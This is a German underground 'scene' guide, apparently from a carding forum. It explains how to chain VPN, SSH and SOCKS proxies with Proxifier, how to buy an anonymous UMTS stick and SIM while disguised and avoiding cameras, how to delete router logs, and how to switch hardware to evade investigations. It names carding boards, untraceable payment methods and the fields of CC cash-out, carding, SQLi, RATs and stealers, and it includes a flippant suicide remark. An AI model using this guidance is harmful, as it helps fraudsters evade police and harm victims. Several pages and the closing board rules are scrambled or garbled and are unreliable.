Anonymisierungsdienstanbieter Tutorials zur Einrichtung des SSH-Tunnels mittels PuTTY.

(c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy
~ 17 ~



V. Einrichten von Proxifier fr den Sock5


Nun mchten wir hinter den VPN SSH Tunnel Verbund noch einen Sock5 schalten. Das ist eine
weitere Sicherheitsmanahme, natrlich nur, wenn man

wieder einen anderen Serverstandort whlt.

Proxifier ist ein Programm, was laufende Programme berwacht und, falls diese Daten aus dem
Internet empfangen bzw. welche senden, diese Daten durch

einen Proxy tunnelt. Der Vorteil bei Proxifier liegt darin, dass man nicht jedes Programm einzeln
konfigurieren muss, sondern im Proxifier Regeln fr

jedes einzelne oder alle Programme konfigurieren kann und diese dann entsprechend der Regel
getunnelt werden.

1. Schritt: Ladet euch hier Proxifier herunter, entweder als Installationsdatei oder als Portable-

Version.

2. Schritt: Nun installiert ihr Proxifier. Da bei euch bereits Open VPN und ein SSH-Client laufen,
startet ihr nun Proxifier (und wieder ganz wichtig

mit Adminstratorrechten und automatisieren wie auf Bild 2).

Proxifier startet (unter Umstnden) minimiert im Systemtray als graues Viereck. Wenn man alles
richtig konfiguriert hat, dann fllt sich dieses Viereck,

wenn Daten gesendet bzw. empfangen werden. Das werdet ihr ja hoffentlich spter sehen :)



(Bild 10)


3. Schritt: Im Proxifier geht ihr oben auf Profile und whlt dann Proxy Servers aus


(c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy
~ 18 ~


(Bild 11)


Danach ffnet sich das Proxy Servers Men.



(Bild 12)


4. Schritt: Hier klickt ihr einfach oben rechts auf den Button Add. Dort gebt ihr unter Server Adress
localhost ein (natrlich ohne

Anfrhungszeichen) und als Port 8050.

Wichtig: Der Port ist unter Umstnden bei anderen Anbietern anders. Das ist aber nicht kompliziert
und man versteht das recht einfach. Um nun die Daten

von Proxifier durch den SSH-Sock-Server schicken zu lassen, muss Proxifier natrlich den internen
Port vom Localhost-Sock-Server haben (local

port).
Dieser ist bei Perfect Privacy 8050.



(Bild 13)


Dann macht ihr einen Haken bei Socks Version 5 und macht einen Haken bei Authentification, dann
knnt ihr eure Zugangsdaten eintragen. Das wars, nun

mit OK den Server in die Proxifier-Serverliste aufnehmen. Also alles wie auf dem Bild.


(c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy
~ 19 ~


(Bild 14)


Ihr knnt mittels Druck auf den Button Check die Verbindung checken. Wenn ihr viel grne Schrift
seht, ist alles ok, ansonsten habt ihr irgendwie
einen Fehler gemacht. Nachdem ihr auf OK geklickt habt, fragt euch Proxifier, ob ihr den localhost-
Server als Standard-Proxy nehmen wollt, was ihr
bejaht.

Der Localhost-Server erscheint nun oben in der Server Liste, wie auf folgendem Bild.



(Bild 15)


5. Schritt: Nun tragt ihr genau wie eben einen neuen Server ein (auf Add klicken) aber ihr tragt als
Server IP nicht localhost ein, sondern die IP des

Servers an, den ihr als Sock5 verwenden wollt. Als Port tragt ihr hier den Externen Port (Remote Port)
des Soc5-Servers ein. Ansonsten ist alles gleich

wie beim localhost-Server.



(Bild 16)
(c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy
~ 20 ~



Diesen Schritt knnt ihr natrlich beliebig oft wiederholen und alle Server eures Anbieters eintragen.


6. Schritt: Falls ihr keinen vicSock verwendet, knnt ihr zu Schritt 6 springen. Den vicSock fgt ihr
genau so hinzu wie die Sock5-Server, nur dass ihr

keine Authentifikation bentigt. Einfach die IP eintragen, den Port, Sock5 auswhlen und ohne
Authentifikation auf OK.



(Bild 17)


7. Schritt: Nun mssen wir natrlich dafr sorgen, dass die Daten, die vom VPN Server zum SSH-
Tunnel-Server gehen danach durch den Sock5-Server gehen

(und dann ggf. noch zum vicSock). Wie gesagt, ich empfehle lieber einen Sock5-Server eines anderen
Anbieters als zwei Soc5-Server hintereinander

zuschalten, die beim gleichen Anbieter sind.

Um dies also zu bewerkstelligen, mssen wir eine Kette von Servern einstellen, also eine Proxy Chain.
Die Daten werden dabei durch jeden der

eingetragenen Proxies geroutet, und zwar in der Reihenfolge, wie sie in der Chain angeordnet sind
.
Im gleichen Men, in dem wir per Add Server hinzugefgt haben (siehe Bild 12), kann man im
unteren Bereich ber dem Cancel Button auf Proxy Chain

gehen.



(Bild 18)

(c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy
~ 21 ~


8. Schritt: Danach erstellen wir eine neue Proxy-Chain, indem wir auf Create klicken und benennen
diese nach Belieben, zum Verstndnis heit sie bei

uns Chain 1.
Unsere Chain 1 erscheint nun in der Proxy Chain-Liste und wird mit Empty, also leer,
beschrieben.



(Bild 19)



Dies wollen wir natrlich ndern und die Chain fllen.


9. Schritt: Nun markiert ihr den localhost-Server aus der Proxifier-Serverliste und zieht diese per Drag
and Drop in die gerade erstellte Proxy Chain

Chain 1.



(Bild 20)


Wenn ihr alles richtig gemacht habt, erscheint nun der Server localhost in der Proxy Chain und ein
Haken ist davor gesetzt. Diesen Haken belasst ihr

drin.


(c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy
~ 22 ~


(Bild 21)



10. Schritt: Auf die gleiche Art und Weise zieht ihr nun den oder die Sock5-Server in die Chain Chain
1, die ihr verwenden wollt. Ihr knnt auch

einfach alle Server rberziehen, da ihr in der Kette ohnehin durch Haken setzen oder entfernen
entscheiden knnt, welche Server in der Chain verwendet

werden und welche nicht. Wir ziehen hier nur einen Sock5-Server (Kairo) und einen vicSock rber.

Nehmen wir an ihr habt einen Sock5, was ja wie gesagt, ausreicht und einen vicSock. Also, sind in der
Server Chain nun drei Server; localhost, euer

Sock5-Server und der vicSock.

Sehr sehr wichtig ist, dass der Server localhost als erster in der Liste ist. Die Sock5-Server kommen
danach, in unserem Fall nur einer

(zumidnest bei nur einem ist ein Haken gesetzt, die ohne Haken sind ohnehin ausgestellt).
Wenn ihr einen vicSock verwendet, dann fgt ihr natrlich noch diesen als letzten Server in die Chain
und setzt einen Haken davor.

Wenn ihr alles richtig gemacht habt, sieht das Men im Proxifier so aus:



(Bild 22)
Danach knnt ihr das Men schlieen.







(c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy
~ 23 ~

11. Schritt: Nachdem wir nun eine Server-Chain erstellt haben, machen wir uns daran, fr die
Programme, die wir verwenden, einzustellen, dass diese durch

eben jene gerade erstelle Server-Chain getunnelt werden. Um das einzustellen, gehen wir im
Proxifier oben auf Profile und klicken dann auf

Proxification Rules.



(Bild 23)


12. Schritt: Wenn sich das Proxification Rules-Men ffnet, dann sind dort bereits zwei Regeln
eingestellt. Eine heit localhost und eine default.
Bei Localhost knnt ihr bei Action (herunterfahrbares Men) direct eingestellt lassen. Es geht
dabei ohnehin nur um interne Netzwerkzugriffe und die

brauchen wir nicht zu tunneln, also direct einstellen.

Bei der Regel default whlt ihr bei Action (herunterfahrbares Men) Chain Chain 1 aus.

Wenn ihr alles richtig gemacht habt, dann sieht das aus wie auf dem Bild.



(Bild 24)


13. Nun mssen wir fr die Programme Regeln erstellen. Dies knnen wir entweder fr alle
Programme einstellen oder eben fr ausgewhlte, wie z.B.

firefox. Prinzipiell kann man alle Programme tunneln lassen.

Ihr geht also unten links auf Add und knnt dort eine Regel eintragen.

Name: tragt hier den Namen des Programms ein

(c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy
~ 24 ~

Applications: Geht auf Browse und geht zur .exe Datei des zu tunnelnden Programms. Z.B. auf
C:\Programme\Firefox und whlt dort die firefox.exe aus.
Wollt ihr alle Programme tunneln, so knnt ihr in das Feld das Wort Any eintragen, natrlich ohne
Anfhrungszeichen.

Target Hosts: Dieses Feld ist dafr gedacht um bestimmte IPs oder Domains auszuwhlen. Dann wird
das Programm nur dann getunnelt, wenn es diese IPs oder

Domains anfragt. Hier tragt ihr einfach Any ein, da alle Ziel-Adressen getunnelt werden sollen.

Target Ports: Ihr knnt auch nur bei bestimmten Ports tunneln lassen. In unserem Fall, wo alle
Zieladressen und Ports getunnelt werden sollen, tragt ihr

auch hier Any ein.

Action: Hier knnt ihr auswhlen, durch welchen Server bzw. welche Chain das Programm getunnelt
wird. In unserem Fall whlen wir die gerade erstellte

Chain Chain 1 aus.

Wenn ihr alles richtig eingestellt habt, sieht das Men wie folgt aus:



(Bild 25)


Klickt nun auf OK.

Ihr habt nun entweder nur fr Firefox bzw. fr ein anderes Programm eurer Wahl oder eben fr alle
Programme (Any eingetragen bei Applications) das

Tunneling eingestellt. Die Daten wandern vom VPN zum SSH und dann zum Sock5 und ggf. noch zum
vicSoc und dann zu euch. Besser gehts nicht


VI. DNS an den Proxy anpassen

(c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy
~ 25 ~


Ein Blick auf einen IP-Checker zeigt euch, dass immer noch eure deutsche DNS mitgesendet wird. Das
ist zwar nicht ganz so schlimm wie das Mitsenden der

IP aber immer noch zurck verfolgbar. Das wollen wir natrlich umgehen.
Man kann in den Netzwerkeinstellungen rumspielen, im Config-Men (about:config) vom Firefox
oder einfach Proxifier darauf einstellen.

1. Schritt: Dazu einfach im Proxifier oben auf Profile gehen und dann auf Name Resolution
klicken.



(Bild 26)


2. Schritt: Im aufgegangenen Men macht ihr nur einen Haken bei Resolve hostname through
Proxy, die Haken bei Detect DNS Settings automatically und

Try to resolve via local DNS Service first mssen drauen sein.

Wenn ihr alles richtig eingestellt habt, sieht das aus wie folgt.



(Bild 27)


Nun ist alles richtig eingestellt und ihr knnt euren Erfolg bei einem IP-Checker berprfen im
Firefox selber msst ihr nichts mehr einstellen und

auch in keine anderen Programm, Proxifier bernimmt die Tunnelung durch die Proxies fr alle
Programme, die ihr ausgewhlt habt.
(c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy
~ 26 ~




VII. Mac-Adresse bzw. IMEI (bei UMTS-Sticks)?


Bei eurer Mac-Adresse braucht ihr euch an sich keine Sorgen zu machen. Diese wird nicht ber das
Internet bertragen. Wie das bei IMEI-Nummern bei

UMTS-Sticks ist, kann ich nicht genau sagen. Soweit ich wei sendet man bei jedem Connect die
IMEI-Nummer des Sticks an den Sim-Karten-Provider. Dies

kann man umgehen, indem man die Firmware flasht.

Dazu gibt es im Internet auch viele Tutorials. Wenn man mit einem Ano-UMTS-Stick und einer Ano-
Sim im Internet ist, braucht man auch keine

Anonymisierungsdienste (VPN usw), sollte nur einiges beachten. Zu Sicherheitsvorkehrungen bei
UMTS-Sticks spter mehr.

Die Mac-Adresse ist nur dann wichtig zu beachten, wenn ihr ein offenes W-Lan als Internetquelle
nutzt. Da der Router die Mac-Adresse aller verbundenen

PCs (bzw. eher gesagt ihrer Netzwerkkarten) loggt, msst ihr da natrlich bevor ihr disconnectet in
das Men des Routers gehen und dort die Logs

lschen. Wenn das Routermen nicht passwortgesichert ist, sollte das kein Problem sein.

Im Falle von Anonymisierung durch VPN+SSH Sock+Sock5+(vicSock) ist kein Verschleiern oder ndern
der Mac-Adresse notwendig, da wir uns ja nicht in ein

offenes W-Lan verbinden.



VIII. Der erste Test

Nun knnt ihr zum Beispiel Firefox starten. Wenn ihr alles richtig gemacht habt, erscheint Firefox
nach dem Start im Proxifier Connections Men und

unten sehr ihr, wie die empfangenen und gesendeten Daten durch die Chain Chain 1 getunnelt
werden, wenn ihr eine Adresse bei Firefox eingebt.

Das sieht dann so aus, wie auf dem Bild. Das graue Proxifier-Viereck im System Tray fllt sich
zustzlich noch Blau (Datentransfer).

(c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy
~ 27 ~



(Bild 28)


Damit das bei euch auch so aussieht, startet ihr Firefox und geht auf Whoer. Das empfehle ich euch
bei jedem Connect, um erst mal zu berprfen, ob

alles mit den Einstellungen ok ist.

www.whoer.net/extended


Wenn ihr alles richtig gemacht habt, seht ihr dort die IP, den Standort und den DNS des Sock5-
Servers bzw. eures vicSocks. Bei diesem Bild ist kein

vicSock hintergeschaltet, so dass die IP meines Sock5-Servers (letzter aktiver Server in der Chain)
angezeigt wird (Kairo, gypten)



(Bild 29)
Die Seite msste bei euch so aussehen, dann habt ihr, wenn Proxifier augenscheinlich luft, alles
richtig gemacht.


Wie ihr seht, ist Java bei mir disabled. Bei euch wird das wohl als enabled angezeigt. Das heit ihr
seid noch nicht fertig, also weiter gehts
(c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy
~ 28 ~

Zustzliches zur Erhhung der Anonymisierung (Wichtig,
nicht leichtfertig behandeln)


Da nicht nur der Browser oder das benutzt Programm eure IP oder andere Informationen versenden,
sondern auch Programme, die im Hintergrund laufen,

mssen diese deaktiviert werden.

Speziell sind da Java, Flash und Anti-Viren Programme gemeint. Grundstzlich auch jede Software,
die ihr legal erworben habt und die Rckschlsse auf

eure Lizenzinformationen zulsst. An sich ist es zwar ziemlich unwahrscheinlich, dass der Software-
Hersteller berhaupt nach deinen Lizenzdaten gefragt

wird, aber Sicherheit geht ja bekanntlich vor.


I. Flash

Knnt ihr getrost ausschalten, einfach ber Systemsteuerungen deaktivieren. Fr die meisten
Anwendungsgebiete der Szene ist Flash nicht unbedingt von

Nten. Es gibt nmlich so genannte LSOs oder Super Cookies, das sind Flash Cookies, die zu
Sicherheitszwecken verwendet werden. Pay Pal verwendet diese

zum Beispiel, so kann Pay Pal erkennen, dass es sich um die selbe Person handelt, wenn diese mit
den selben Flash Cookies aber mit zwei Accounts

einloggt.

Wenn ihr Flash nicht ausschalten wollt, dann gibt es fr den Firefox das Addon Better Privacy.
Dieses ermglicht euch, richtig eingestellt, dass

Firefox automatisch alle Flash Cookies/LSOs/Super Cookies lscht, sobald er geschlossen wird. Better
Privacy knnt ihr ganz einfach ber den internen

Addon-Appstore vom Firefox runterladen und superleicht installieren.

Stellt es so ein wie auf dem Bild, dann fragt euch Firefox bei jedem Beenden, ob ihr die Flash Cookies
lschen wollt, oder nicht.


(c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy
~ 29 ~


(Bild 30)


Andererseits muss man dabei sagen, dass es natrlich auch auffllig ist, dass die Flash
Cookies/LSOs/Super Cookies bei jedem neuen Log-In neu erstellt

werden und dann beim nchsten Log-In wieder weg sind. Daher wrde ich empfehlen einfach Flash
zu deaktivieren.


II. Java

Java solltet ihr auch deaktivieren. Bentigt wird es nicht und es sendet unter Umstnden die richtige
IP mit. Daher solltet ihr es wirklich

deaktivieren, dies knnt ihr unter Systemsteuerungen machen.


III. Java-Script

Java-Script stellt keine Gefahr da, knnt ihr getrost anlassen.


IV. Anti-Viren-Programme

Diese knnt ihr, msst ihr aber nicht ausschalten. Die Antiviren-Programme knnten Rckschlsse
auf eure Lizenzinformationen und damit auf eure

Rechnungsadresse zulassen. Bei kostenfreien Antiviren-Programmen ist das natrlich kein Problem.


V. Welchen Browser soll ich nehmen?:

Die Frage lsst sich in meinen Augen recht leicht beantworten, Mozilla Firefox. Bei Google Chrome
habe ich z.B. immer den Google spioniert alle aus-

Beigeschmack.

Kleiner Tipp, ladet euch Portable Firefox herunter
(http://portableapps.com/apps/internet/firefox_portable) und installiert diesen. Dieser wird nicht

(c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy

direkt installiert, sondern startet k
knnt ihr einen eigenen Firefox nu

verwenden, in der Szene rumzuga
euren Real-Life-Firefox nicht.

Wichtig: Nicht vergessen, dann na
erstellen, falls ihr nicht eh eine Re

alle Programme gemacht habt.



VI. Die einfachste Methode

Wenn ihr euren Reallife-Firefox od
Java einzeln abzustellen, dann kn

des Firefox Addon-Appstores das
Ist es installiert, erscheint im Firef
Silverlight direkt auszuschalten. Be

bitte, dass diese Funktionen nur im
diese direkt zu deaktivieren (es se

wirklich nur Firefox und sonst nich

So sieht das dann aus, sehr effekti



(Bild 31)


FERTIG!!

Ihr seid Fertig, eure IP ist verschl
Java und Flash stellen fr euch kei

da. Super!

Wie ihr auf dem Bild noch erkenne
~ 30 ~
tet komplett aus dem Ordner heraus, in das dieser e
x nur dafr
zugammeln. Was ihr mit diesem Firefox Portable ma
natrlich auch eine Regel im Proxifier fr den Porta
e Regel Any fr

x oder den Portable-Firefox verwendet und keine Lu
knnt ihr euch mittels
das Add On Quick Java runterladen.
irefox unten rechts die Mglichkeit, Java, Java Script
n. Beachtet dann aber
ur im Firefox ausgeschaltet sind, daher ist es immer
s sei denn ihr benutzt
nichts).
fektiv
chlsselt, euren Daten sind verschlsselt, eure DNS i
keine Gefahr mehr
ennen knnt, ist Google bei mir auf Arabisch. Wenn
er entpackt wurde. So
macht beeinflusst
ortable Firefox zu
e Lust habt, Flash und
cript, Flash und
er noch am besten,
NS ist verdeckt und
nn man nicht gerade
(c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy

Deutsch als Sprache im Firefox,

ausgewhlt hat, dann zeigt euch G
connectet, und das ist in meinem

Die Werbung in ICQ ndert sich da



Sicherheit durch UM


Wer einen Laptop hat kann sich di
anonymen UMTS-Stick und eine a

man mit dem Laptop ber die Sim


I. UMTS Stick kaufen

Ihr knnt euch bei Aldi einen unlo
nicht mal schlecht

Einfach eine anonyme Simkarte eg
Sicherheit noch mal zu erhhen (j

paranoid), kauft ihr den UMTS-Sti
Cappi. Die Kamers bei Aldi sind so

man im Kassenbereich erkennen k
bezahlt, daher dort lieber sicher v

Also ich empfehle diese Methode,
auf einen BKD carden bzw. direkt

besten, man kauft gleich mehrere
mal zu wechseln.


II. Ano Sim

Die Besorgung der Ano-Sim verlu
eine Sim-Karte. Diese kann man d

einem Internet-Cafe aktivieren. Be
~ 31 ~
fox, sondern Automatisch
ch Google natrlich die Sprache an, aus dessen Land
em Fall gypten
h dadurch auch usw. usf. Also: Alles Super!
UMTS-Sticks
h diesen ganzen VPN-Proxy-Krims-Krams sparen und
ne anonyme Sim-Karte holen. Dann kann
Sim-Karte ins Internet.
unlocked UMTS-Stick kaufen. Dieser kostet 39.99 Eur
te egal welchen Anbieters da rein und schon kanns l
n (ja ich wei, ich bin
Stick im Winter total eingehllt und im Sommer mi
d so detailliert, dass
en kann, ob man mit einem Zwanzig oder einen Fn
er vorgehen.
ode, man kann sich natrlich aber auch einen anony
ekt auf eine PS/einen HD. Am
rere, wie wir spter sehen, ist es nicht von Nachteil d
rluft hnlich. Man geht leicht vermummt in einen L
an dann telefonisch oder aus
n. Beim Internet-Cafe natrlich auch leicht vermumm
and ihr fr Google
und sich einen
Euro und ist noch
ns losgehen. Um die
r mit Sonnenbrille und
Fnfzig Euro Schein
onymen UMTS-Stick
teil die Sticks ab und an
en Laden und kauft
ummt hingehen und
(c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy

erst mal abchecken, ob Kameras d

dass manche Telefonzellen Kamer
Preislich sind Aldi Talk (12 Euro St
Abrechnung) und Congstar (10 Eu

Euro Monatsflat, teure Minutenab
wenn man wirklich viel macht.

Beides, Ano-Stick und Ano-Sim kn
Internet-Cafes kaufen. Diese sollte

auch keine Kamera haben und am
jede Woche eure Zwiebeln kauft


III. Allgemeines zur Sicherheit mit

Selbst mit UMTS-Stick ist man nat
zumindest laut einigen Quellen im

sollte man dennoch vom grmg
online gehen.

Sucht euch einen belebten und gu

Dann solltet ihr immer eine neue
Startguthaben ist eh immer genau

manchen Fllen sogar noch hher
Den UMTS-Stick wrde ich auch a

Dabei geht es nicht nur um die Or
natrlich bereits durchgegangene

IMEI-Nummer angehangen werde

So meine lieben, JETZT ist es endl
Jedoch solltet ihr beachten, dass
nichts bringt, wenn jemand von e
Erstrecht eure Real-IP solltet ihr b



Weiter gehts ;) ...

~ 32 ~
ras da sind. Beachtet auch,
meras haben.
o Startguthaben, 15 Euro Monatsflat, 2 Euro Tagesfla
0 Euro Startguthaben, 10
enabrechnung) recht gut. Flats lohnen sich da natrli

knnt ihr natrlich bei den Arabern und co in diesen
ollten dann natrlich
am besten auch nicht neben dem Gemse-Trken
ft
t mit UMTS-Sticks
natrlich nie ganz sicher. UMTS Sticks sind auf 10 m
n im Netz. Grundstzlich
mglichen Risiko ausgehen und lieber nicht von Mut
d gut zugnglichen Ort und surft da rum und treibt e
ue Sim-Karte kaufen und diese nicht wieder auflade
nau so hoch wie der Preis bzw. in
her. Aufladen lohnt sich also nicht.
ch alle 4 Sim-Karten mal wechseln und einen neuen k
e Ortbarkeit, sondern auch darum, dass im Falle von
ene Aktionen mittels der
erden knnen. Daher stndig Stick und Sim-Karte we
endlich soweit, ihr knnt sicher und beruhigt in der
ass die Ganze Anonymisierung die wir gerade durch
on euch den Namen, die Adresse oder Telefonnumm
ihr behten wie euer Leben.
esflat, teure Pro-MB-
trlich, vor allem,
esen Handy-Telefon-
sein, bei dem ihr
0 m genau ortbar,
Muttis Kche aus
ibt euren Schabanack.
laden. Das
en kaufen.
von Ermittlungen euch
wechseln.
der Scene starten.
urchgefhrt haben
ummer erfhrt.
(c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy
~ 33 ~

3. Allgemeine Scene Regeln und NoGos
Also Normaler weie richtet sich die Scene nach Gewissen "Grundregeln", da diese auf fat Allen
Boards gleich sind. Da wre zum einen die verschiedenen Fraud, Free und Blackmarket Sektionen.
Welche erst ab einer Bestimmten Postzahl benutzt werden drfen. Jedoch gelten dazu keine
unntigen Fun Posts, sondern nur Qualitative Beitrge in gewissen Zeitabstnden, alles Andere wird
als Spam notiert. Desweiteren Gelten Beitrge wie "thx" "cool knnt ich gebrauchen" etc. als Spam,
Bitte nutzt den THX Button unter dem User Avatar, oder unter dem Post, je nach Board version,
Design und Einstellung. Ein Weiteres Nogo sind Fragen wie "howto Hack" oder "Was kann ich mit
einer IP-Adresse anstellen?" Ihr solltet euch Darber im Klaren sein, dass die Ganzen Gerchte wie
z.B. "So jetzt hab ich deine IP durch Ts jetzt gehe ich mal eben auf deinen Pc, und lsche dir Avira,
danach mach ich dir ein nacktbild als Hintergrundbild" nicht mglich sind, bzw fr Leute die nicht
Mindestens Jahrelange Erfahrung und Kenntnisse Gesammelt haben, desweiteren die ntigen Tools
besitzen. Also Informiert euch. es gibt die Sogenannte SuFu (=Suchfunktion) welche Oben Rechts auf
den Boards zu finden ist. Erst Informieren, dann zu den gesammelten Infos fragen Stellen.
Im Blackmarket (=Schwarzmarkt fr IT-Ware/tools/maleware/dienstleistungen/sonstige Waren)
gelten Generell die Regeln, dass ihr zum einen nach Abschluss eines Kaufs Feedbacks abgebt, aber
vor dem Kauf keine unntigen Kommentare abgebt z.B Fragen und Ratespielchen zu Tutorials sind
unerwnscht und gelten als Absolute nogos. Schreiber Von Tutorials stecken Viel Arbeit in Konzepte
etc, und lassen sich ungern das Geschft vermieen, Aufgrund von dummen Anschuldigungen dass es
das schon gab etc. Desweiter solltet ihr einen Artikel Verkaufen, msst ihr beachte, dass ihr Alle infos
angebt wie z.B. Preis, Zahlungsmethoden, Kurzinfo ber Artikel. Hauptregeln bei solchen Trades sind
dass ihr auf 5 Verkufe Limitiert, und unter einem Gesamtwert von 150 bleibt. Um hher zu Traden
und mehr zu Verkaufen braucht ihr einen Vendor welchen ihr bei einem Admin kaufen knnt.... das
sollte fr erste reichen, haltet ihr euch daran habt ihr schon mal einen bann weniger.

Zahlungsmethoden in der Scene sind ukash, LR und PSC. Diese sind an Tankstellen via Barzahlung
erhltlich. PSC wird etwas niedriger als ukash gewertet. Momentan im Kommen ist LR, also empfehle
ich von Anfang an LR zu benutzen.

4. SceneBoard bersicht & 5. Nutzerrnge
www.zion-network.net
www.cardermarket.cc
www.free-hack.com
www.babylon-crew.biz
www.russian-elite.net
und diverse andere...




weiter gehts... :)



(c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy
~ 34 ~

In den Boards wird unter verschiedenen Nutzerrngen unterschieden:
-Admin (Administrator)
-Smod (Super-Moderator)
-Mod (Moderator)
-Vip (Very Important Person)
-3rd Level (drittes Level)
-2nd Level (zweites Level)
-User (normal registrierter User)
-Gast (unregistriert)

In der Regel ist die "Rangliste" wie hier aufgelistet von Admin bis Gast absteigend sortiert.

6. Sicheres Chatten mit Scene-Usern
Um sicher mit anderen Scene-Usern zu kommunizieren, nutzt ihr am besten nicht das
Standard ICQ,MSN und co sondern Miranda Native IM mit OTR.
Dies knnt ihr hier: http://www.xup.in/dl,31295287/Miranda_IM_Native_0.4.2.0.exe/
downloaden (Ich habe das Paket zusammengestellt, ICQ & Jabber + OTR enthalten)

Jetzt habt ihr es geschafft, ihr seit in der Scene, sicher und mit Vorkenntnissen. Doch nun stellt sich
die Frage wofr den Aufwand? Geld? Macht? Ruf? Ich kann euch versichern, ohne langjhrige
Erfahrung und Kontakte werdet ihr kein "Buisness" machen, solltet ihr also auf Geld ausseihen,
empfehle ich gleich, weiterbilden, weiterbilden und weiterbilden. Dazu empfehle ich die Bereiche
(CC-auscashen / BDs erstellen & Fillen / Carding). Seit ihr auf Macht aus, empfehle ich euch sich im
Bereich System-Zugriffe und Web-Zugriffe (SQLI / RATS & Stealer / Bots). Seit ihr auf Ruf aus,
empfehle ich Rechner ausschalten, Waffe kaufen - Kopfschuss. In der Scene wird kein Name
bekannt, nur der Scene-Name und Scene-User kommen und gehen, da bleibt nichts lange im
Gedchtnis!...

An diesem Punkt, Welcome to the Scene, be Individual, be Strong, dont Ripp and stay friendly!
Gre und ein dickes Danke an das Russian-Elite - Team fr ihre Untersttzung.

(c)holy (c)holy (c)holy (c)holy (c)holy
(c)holy (c)holy
(c)holy
RussianElite TeamSeite
1e|| 2
8oardrege|n, Sty|egu|de, D|e ersten osts
1LIL 2 A (8oardrege|n)
1 - Allgemelnes
2 - 1hemen, 8elLrage und lnhalL
3 - AvaLar und SlgnaLur
4 - 1radlng
3 - 8efrderungen
6 - Abschlleende lnfos
1 - Allgemelnes
1.1 - LrsLe lnfo
lhr seld verpfllchLeL, mlndesLens eln Mal ln der Woche nachzusehen, ob es AkLuallslerungen an den
8oardregeln gegeben haL.
1.2 - 8espekLvoller umgang unLerelnander
LusLlgmachen uber andere, 8L-uaLen posLen und 8eleldlgungen sowle rasslsLlsche,
menschenverachLende, padophlle oder rellglonsverachLende 1hemen, 8elLrage, lnhalLe, 8llder und
ahnllches MaLerlal slnd verboLen!
1.3 - versLandllche Ausdruckswelse
AchLeL auf 8echLschrelbung, CrammaLlk und der exakLen Schllderung eures Anllegens.
1.4 - ule 8eglsLrlerung auf 8usslan-ellLe.neL
ule 8eglsLrlerung lsL kosLenlos und eln rlvlleg, keln 8echL. !eder user hafLeL fur selne geschrlebenen
1hemen, 8elLrage und angehangLen uaLelen.
1.3 - 8enuLzernamen
8enuLzernamen mlL pornographlschen, rellglonsverachLenden, rasslsLlschen,
menschenverachLenden, padophllen oder beleldlgenden lnhalLen slnd verboLen. Lbenso slnd u8Ls
als 8enuLzername unLersagL.
1.6 - AccounLs
verwende eln slcheres assworL. nuLze deln assworL nlchL auf anderen loren. SollLe durch delnen
AccounL eln Schaden enLsLehen, wlrd dleser dauerhafL gesperrL.
SollLesL du delne LoglndaLen vergessen oder verlleren, lsL deln AccounL verloren.
AccounLs werden generell nlchL gelschL. Mehrere AccounLs slnd verboLen. MulLlaccounLs, dle
vorher nlchL angemeldeL wurden, werden permaneL gesperrL.
(c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy (c)holy
RussianElite TeamSeite
1.7 - 8ezelchnungen der elnzelnen 8enuLzergruppen
ule wlchLlgsLen 8enuLzergruppen slnd lolgende:
Team:
Administrator - entspricht einem vollwertigen Administrator.
Super ModeraLors - enLsprlchL elnem vollwerLlgen ModeraLor.
Moderator entspricht einen Moderator mit Einschrnkungen.
Vendor entspricht einem verifizierten Verkufer.
Er bietet seine Ware dauerhaft und/oder in Massen an.
Benutzergruppen:
NP-Member entspricht einem Benutzer der in unserem NP Forum registriert ist.
Registered Users entspricht einem normalen Benutzer.
1lme 8ann- enLsprlchL elnem auf ZelL gesperrLen 8enuLzer.
8anned users - enLsprlchL elnem gesperrLen 8enuLzer.
WlchLlg: Auch wenn eln 8enuLzer elne andere larbe haL, bedeuLeL es nlchL, dass er auLomaLlsch
verLrauenswurdlg(er) lsL. 8eachLeL dles belm kommunlzleren.
2 - 1hemen, 8elLrage & lnhalL
2.1 - 8oardsprache
ule erlauben 8oardsprachen slnd lsL ueuLsch, Lngllsch und 8usslsch!
2.2 - lormaLlerung
ule 8elLrage mussen versLandllch und sLrukLurlerL ersLellLen werden. uer 1hreadLlLel muss klar auf
den lnhalL hlnwelsen. Slehe hlerzu unseren SLylegulde.
2.3 - vor dem LrsLellen elnes neuen 1hemen
8evor eln neues 1hema erffneL werden darf, mussen dle Ankundlgunden (SLlckles) gelesen und dle
SuchfunkLlon benuLzL werden. LrsL wenn keln 1hema gefunden wlrd, ln welches delne lrage passL
bzw.delne lrage beanLworLeL, darf eln neues 1hema ersLellL werden.
3 - AvaLar und SlgnaLur
3.1 - Cre
Lure SlgnaLuren und AvaLare sollLe ln elnem angemessenem 8ahmen blelben.
3.2 - unzulasslge lnhalLe
unLer lnhalLe werden alle user-generlerLen 8elLrage zum lorum versLanden, also ua. osLlngs,
1hreadLlLel, AvaLare, SlgnaLuren, lnwandbelLrage. lolgende lnhalLe slnd generell nlchL zulasslg
- 8eleldlgungen
